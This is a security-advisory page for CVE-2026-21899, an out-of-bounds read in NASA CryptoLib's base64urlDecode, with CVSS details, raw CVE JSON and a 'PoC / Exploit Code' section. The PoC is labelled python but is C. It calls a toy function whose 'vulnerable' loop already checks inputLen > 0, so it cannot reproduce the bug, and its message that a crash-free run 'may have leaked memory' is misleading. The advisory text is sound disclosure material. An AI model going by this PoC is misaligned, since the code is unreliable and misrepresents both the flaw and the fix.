Security Vulnerability Report
中文
CVE-2026-21899 CVSS 4.7 MEDIUM

CVE-2026-21899

Published: 2026-01-10 01:16:18
Last Modified: 2026-01-15 21:45:25
Source: [email protected]

Description

CryptoLib provides a software-only solution using the CCSDS Space Data Link Security Protocol - Extended Procedures (SDLS-EP) to secure communications between a spacecraft running the core Flight System (cFS) and a ground station. Prior to version 1.4.3, in base64urlDecode, padding-stripping dereferences input[inputLen - 1] before checking that inputLen > 0 or that input != NULL. For inputLen == 0, this becomes an OOB read at input[-1], potentially crashing the process. If input == NULL and inputLen == 0, it dereferences NULL - 1. This issue has been patched in version 1.4.3.

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:nasa:cryptolib:*:*:*:*:*:*:*:* - VULNERABLE
NASA CryptoLib < 1.4.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2026-21899 PoC - Triggering OOB read in base64urlDecode // This PoC demonstrates the vulnerability when inputLen == 0 #include <stdio.h> #include <stdlib.h> #include <string.h> // Vulnerable function (simplified CryptoLib base64urlDecode) void vulnerable_base64urlDecode(char* input, size_t inputLen) { // BUG: Dereferences input[inputLen - 1] BEFORE checking validity // When inputLen == 0, this accesses input[-1] (OOB read) while (inputLen > 0 && input[inputLen - 1] == '=') { inputLen--; } // Process remaining data... } // Fixed version void fixed_base64urlDecode(char* input, size_t inputLen) { // FIX: Check validity first if (input == NULL || inputLen == 0) { return; // Safe return } while (inputLen > 0 && input[inputLen - 1] == '=') { inputLen--; } // Process remaining data... } int main() { printf("CVE-2026-21899 PoC - CryptoLib base64urlDecode OOB Read\n"); printf("=====================================================\n\n"); // Trigger the vulnerability with empty input printf("Triggering vulnerability with inputLen = 0...\n"); // This will cause OOB read at input[-1] // In real CryptoLib, this would be a NULL pointer dereference // or accessing memory before the buffer char* empty_input = NULL; size_t zero_length = 0; printf("Calling vulnerable function with NULL input and length 0...\n"); vulnerable_base64urlDecode(empty_input, zero_length); printf("If you see this message without crash, the OOB read may have leaked memory.\n"); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21899", "sourceIdentifier": "[email protected]", "published": "2026-01-10T01:16:18.113", "lastModified": "2026-01-15T21:45:24.500", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CryptoLib provides a software-only solution using the CCSDS Space Data Link Security Protocol - Extended Procedures (SDLS-EP) to secure communications between a spacecraft running the core Flight System (cFS) and a ground station. Prior to version 1.4.3, in base64urlDecode, padding-stripping dereferences input[inputLen - 1] before checking that inputLen > 0 or that input != NULL. For inputLen == 0, this becomes an OOB read at input[-1], potentially crashing the process. If input == NULL and inputLen == 0, it dereferences NULL - 1. This issue has been patched in version 1.4.3."}, {"lang": "es", "value": "CryptoLib proporciona una solución únicamente de software utilizando el Protocolo de Seguridad de Enlace de Datos Espaciales CCSDS - Procedimientos Extendidos (SDLS-EP) para asegurar las comunicaciones entre una nave espacial que ejecuta el Sistema de Vuelo central (cFS) y una estación terrestre. Antes de la versión 1.4.3, en base64urlDecode, la eliminación de relleno desreferencia input[inputLen - 1] antes de verificar que inputLen &gt; 0 o que input != NULL. Para inputLen == 0, esto se convierte en una lectura fuera de límites (OOB read) en input[-1], lo que podría bloquear el proceso. Si input == NULL e inputLen == 0, desreferencia NULL - 1. Este problema ha sido parcheado en la versión 1.4.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nasa:cryptolib:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.4.3", "matchCriteriaId": "AE1BE91E-2901-42AF-BC66-762CFA7A2582"}]}]}], "references": [{"url": "https://github.com/nasa/CryptoLib/releases/tag/v1.4.3", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/nasa/CryptoLib/security/advisories/GHSA-wc29-5hw7-mpj8", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.